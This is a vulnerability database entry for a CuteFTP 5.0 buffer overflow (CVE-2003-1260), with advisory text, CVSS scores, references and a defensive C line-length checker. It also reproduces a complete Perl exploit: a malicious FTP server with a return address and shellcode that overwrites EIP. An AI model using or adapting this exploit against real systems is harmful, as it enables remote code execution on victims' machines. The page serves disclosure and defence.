CVE-2003-1260
CVSS7.6
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:28

[Original] Buffer overflow in CuteFTP 5.0 allows remote attackers to execute arbitrary code via a long response to a LIST command.


[CNNVD] GlobalScape CuteFTP LIST Response Buffer Overflow Vulnerability (CNNVD-200312-447)

        
        CuteFTP is a file transfer protocol (FTP) client for the Windows operating system.
        CuteFTP does not correctly handle an overly long response to the LIST command sent by the server. A remote attacker can exploit this by forging the server's "LIST" response to trigger a buffer overflow, possibly executing arbitrary instructions on the system with the privileges of the CuteFTP process.
        Once CuteFTP has connected to an FTP server, if the server sends more than 257 bytes of data in its response to the "LIST" command, a buffer overflow occurs in CuteFTP. Crafted response data can overwrite the EIP register, possibly allowing arbitrary instructions to be executed with the privileges of the CuteFTP process.
        

- CVSS (base score)

CVSS score: 7.6 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down entirely]
Access complexity: HIGH [exploitation requires specialized access conditions]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1260
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1260
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-447
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/325659
(PATCH)  BUGTRAQ  20030618 Re: CuteFTP 5.0 XP, Buffer Overflow
http://www.securityfocus.com/bid/6642
(UNKNOWN)  BID  6642
http://www.iss.net/security_center/static/11093.php
(UNKNOWN)  XF  cuteftp-list-command-bo(11093)
http://archives.neohapsis.com/archives/bugtraq/2003-01/0123.html
(UNKNOWN)  BUGTRAQ  20030118 CuteFTP 5.0 XP, Buffer Overflow
http://www.osvdb.org/2181
(UNKNOWN)  OSVDB  2181
http://secunia.com/advisories/7898
(UNKNOWN)  SECUNIA  7898
http://seclists.org/lists/fulldisclosure/2003/Jan/0126.html
(UNKNOWN)  FULLDISC  20030107 CuteFTP 5.0 XP, Buffer Overflow
http://archives.neohapsis.com/archives/bugtraq/2003-02/0087.html
(UNKNOWN)  BUGTRAQ  20030205 Re: CuteFTP 5.0 XP, Buffer Overflow

- Vulnerability information

GlobalScape CuteFTP LIST Response Buffer Overflow Vulnerability
High severity    Boundary condition error
2003-12-31 00:00:00 2007-06-19 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        globalSCAPE
        -----------
        The vendor has not yet provided a patch or upgrade program. Users of this software are advised to monitor the vendor's home page for the latest version:
        
        http://www.globalscape.com

- Vulnerability information (22184)

GlobalScape CuteFTP 5.0 LIST Response Buffer Overflow Vulnerability (EDBID:22184)
windows remote
2003-03-26 Verified
0 snooq
source: http://www.securityfocus.com/bid/6642/info

A buffer overflow condition has been reported for the CuteFTP application. The vulnerability is due to insufficient bounds checking performed on certain FTP command responses. 

If CuteFTP is used to connect to a malicious FTP server that sends an overly long response to the LIST command, the buffer overflow condition will be triggered. Code execution may be possible.

** CuteFTP 5.0 build 51.1.23.1 was reported to still be vulnerable to this issue. For this build, 780 bytes of data are required to overflow the buffer rather than 257 bytes.
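The flaw described in this record is a client that copies a server-controlled LIST line into a fixed-size buffer without first checking its length. The following C program is an added example written for this page; it is not code from CuteFTP, from the database record, or from the exploit below. It shows a bounded reader for the LIST data connection that checks each line against a limit before copying it (so a 300-byte line, like the 257- and 780-byte triggers the record mentions, is rejected rather than written past the buffer), plus a small detection helper that reports the longest line in a captured data-connection payload. The 256-byte limit, the sample listing and the oversized buffer are all constructed for this example; the real client's buffer layout is not on the page.

```c
#include <stdio.h>
#include <string.h>

/* Longest LIST line the reader accepts, excluding CR LF. The record says more
 * than 257 bytes overflowed the original client, so a buffer of that order is
 * assumed here (an assumption for this example, not the client's real layout). */
#define LIST_LINE_MAX 256

enum list_status { LIST_LINE_TOO_LONG = -1 };

/* Measure the line starting at 'start': its length without the trailing CR LF,
 * and where the next line begins. Works on raw bytes; no NUL terminator needed. */
static size_t line_span(const unsigned char *data, size_t len,
                        size_t start, size_t *next)
{
    size_t end = start;
    while (end < len && data[end] != '\n')
        end++;
    size_t n = end - start;
    if (n > 0 && data[start + n - 1] == '\r')
        n--;
    *next = (end < len) ? end + 1 : len;
    return n;
}

/* Hardened reader: the length check happens BEFORE the copy into the fixed
 * buffer, and an oversized line aborts the listing. Copying first (strcpy or
 * memcpy into the fixed buffer, then looking at the length) is the pattern
 * this record describes. Returns lines accepted, or LIST_LINE_TOO_LONG. */
int read_list_lines(const unsigned char *data, size_t len,
                    void (*on_line)(const char *line, void *ctx), void *ctx)
{
    char line[LIST_LINE_MAX + 1];
    size_t start = 0, next = 0;
    int count = 0;

    while (start < len) {
        size_t n = line_span(data, len, start, &next);
        if (n > LIST_LINE_MAX)
            return LIST_LINE_TOO_LONG;   /* reject; never truncate silently */
        memcpy(line, data + start, n);
        line[n] = '\0';
        if (on_line)
            on_line(line, ctx);
        count++;
        start = next;
    }
    return count;
}

/* Detection helper for a captured data-connection payload: the longest line in
 * it. A benign directory listing stays far below LIST_LINE_MAX. */
size_t longest_list_line(const unsigned char *data, size_t len)
{
    size_t start = 0, next = 0, longest = 0;
    while (start < len) {
        size_t n = line_span(data, len, start, &next);
        if (n > longest)
            longest = n;
        start = next;
    }
    return longest;
}

/* Constructed sample listing (not captured from any real server). */
#define BENIGN_LINE1 "-rw-r--r--   1 ftp  ftp      1024 Jan 18  2003 readme.txt"
#define BENIGN_LINE2 "drwxr-xr-x   2 ftp  ftp       512 Jan 18  2003 pub"
static const char BENIGN_LISTING[] = BENIGN_LINE1 "\r\n" BENIGN_LINE2 "\r\n";

/* Constructed oversized response: a single line of 300 'A' bytes, longer than
 * the 257 bytes named in the record. Only the length matters here. */
#define OVERSIZED_LEN 300
static unsigned char oversized_buf[OVERSIZED_LEN + 2];

static const unsigned char *oversized_listing(void)
{
    memset(oversized_buf, 'A', OVERSIZED_LEN);
    oversized_buf[OVERSIZED_LEN] = '\r';
    oversized_buf[OVERSIZED_LEN + 1] = '\n';
    return oversized_buf;
}

int check_benign(void)
{
    return read_list_lines((const unsigned char *)BENIGN_LISTING,
                           sizeof BENIGN_LISTING - 1, NULL, NULL);
}

int check_oversized(void)
{
    return read_list_lines(oversized_listing(), OVERSIZED_LEN + 2, NULL, NULL);
}

size_t longest_benign(void)
{
    return longest_list_line((const unsigned char *)BENIGN_LISTING,
                             sizeof BENIGN_LISTING - 1);
}

size_t longest_oversized(void)
{
    return longest_list_line(oversized_listing(), OVERSIZED_LEN + 2);
}

static void print_line(const char *line, void *ctx)
{
    (void)ctx;
    printf("accepted: %s\n", line);
}

int main(void)
{
    int n = read_list_lines((const unsigned char *)BENIGN_LISTING,
                            sizeof BENIGN_LISTING - 1, print_line, NULL);
    printf("benign listing: %d lines, longest %zu bytes\n", n, longest_benign());
    printf("oversized listing: status %d, longest %zu bytes\n",
           check_oversized(), longest_oversized());
    return 0;
}
```

The reader rejects rather than truncates because a silently shortened listing hides the fact that the server misbehaved; a client that wants to keep going can treat LIST_LINE_TOO_LONG as a reason to drop the connection. The same line-length measure can be applied to a recorded FTP data stream when reviewing a suspicious transfer.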

#!/usr/bin/perl
#
#  Date: 26/03/2003
#  Author: snooq [http://www.angelfire.com/linux/snooq/]
#
#  Basically, this is a fake ftpd that will send out 'overly long' 
#  LIST response to overflow the CuteFTP 5.0 XP client.
#
#  For more info on the bug, read these:
#
#  -> http://www.securityfocus.com/archive/1/307160/2003-02-05/2003-02-11/2
#  -> http://www.securiteam.com/windowsntfocus/5PP0P0U8UU.html
#
#  Notes:
#  ======
#  1. Server's 227 response are hardcoded. (ie IP and data port)
#  2. Payload is harmless 'notepad.exe'.
#
#  Flame or comment, goes to jinyean_at_hotmail_dot_com

use Socket;
use FileHandle;

my $port=21;
my $data_port=24876;			# 97, 44
my $ret="\xa1\xeb\xe9\x77";		# 0x77e9eba1, CALL ESP, Win2K, kernel32.dll 5.0.2195.1600 
my $shellcode="\x55"			# push ebp 
	     ."\x8b\xec"		# mov ebp, esp 
	     ."\xb8\x0e\xb5\xe9\x77"	# mov eax, 0x77e9b50e -> WinExec()  
	     ."\x33\xf6"		# xor esi, esi
	     ."\x56"			# push esi
	     ."\x68\x2e\x65\x78\x65"	# push 'exe.'
	     ."\x68\x65\x70\x61\x64"	# push 'dape'
	     ."\x68\x90\x6e\x6f\x74"	# push 'ton'
	     ."\x8d\x7d\xf1"		# lea edi, [ebp-0xf]	
	     ."\x57"			# push edi		
	     ."\xff\xd0"		# call eax
	    #."\xcc";			# int 3 -> breakpoint, for debugging
	     ."\x55"			# push ebp 
	     ."\x8b\xec"		# mov ebp, esp 
	     ."\x33\xf6"		# xor esi, esi
	     ."\x56"			# push esi
	     ."\xb8\x2d\xf3\xe8\x77"	# mov eax, 0x77e8f32d -> ExitProcess()  
	     ."\xff\xd0";		# call eax
	
for ($i=0;$i<256;$i++) { 	
	$pad1.="A";
}
for ($i=0;$i<133;$i++) { 	
	$pad2.=$ret;
}
for ($i=0;$i<(100-length($shellcode));$i++) { 	
	$pad3.="\x90";
}
for ($i=0;$i<900;$i++) { 	
	$pad4.="\x90";
}

$buff=$pad1.$pad2.$pad3.$shellcode.$pad4;

socket(SOCKET1,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
bind(SOCKET1,pack('Sna4x8',AF_INET,$port,"\0\0\0\0")) || die "Can't bind to port $port: $!\n";
listen(SOCKET1,5);

socket(SOCKET2,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
bind(SOCKET2,pack('Sna4x8',AF_INET,$data_port,"\0\0\0\0")) || die "Can't bind to port $data_port: $!\n";
listen(SOCKET2,5);

NEW_SOCKET1->autoflush();
SOCKET1->autoflush();

NEW_SOCKET2->autoflush();
SOCKET2->autoflush();

while(1){
	accept(NEW_SOCKET1,SOCKET1);
	print NEW_SOCKET1 "220 Welcome to EvilFTPd 1.0\r\n";
	while(<NEW_SOCKET1>) {
		chomp;
		if (/USER/i) {
			print NEW_SOCKET1 "331 OK\r\n";
		}
		elsif (/PASS/i) {
			print NEW_SOCKET1 "230 OK\r\n";
		}
		elsif (/PASV/i) {
			print NEW_SOCKET1 "227 Entering Passive Mode (192,168,8,8,97,44)\r\n";
		}
		elsif (/LIST/i) {
			if (!($pid=fork)) {	# fork a child to handle data connection
				while(1) {
					accept(NEW_SOCKET2,SOCKET2);
					print NEW_SOCKET2 "$buff";
				}
			}
			else {
				print NEW_SOCKET1 "150 OK\r\n";
				print NEW_SOCKET1 "226 OK\r\n";	
			}
		}
		else {
			print NEW_SOCKET1 "200 OK\r\n";
		}
	}
}		

- Vulnerability information

2181
CuteFTP LIST Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

GlobalSCAPE CuteFTP versions up to 5.0.2 contain a flaw that allows a remote buffer overflow. The FTP client fails to check the size of the response to the LIST command before placing it into the buffer, resulting in a stack overflow. This could allow arbitrary code to be executed on the remote victim's machine.

- Timeline

2003-01-18 2002-09-04
Unknown Unknown

- Solution

The vendor has released version 5.0.2 of CuteFTP XP, which is reported to fix the stack overflow vulnerability. Versions 5.0.1, 5.0 and earlier should be uninstalled and version 5.0.2 installed.

- References

- Vulnerability author

Unknown or Incomplete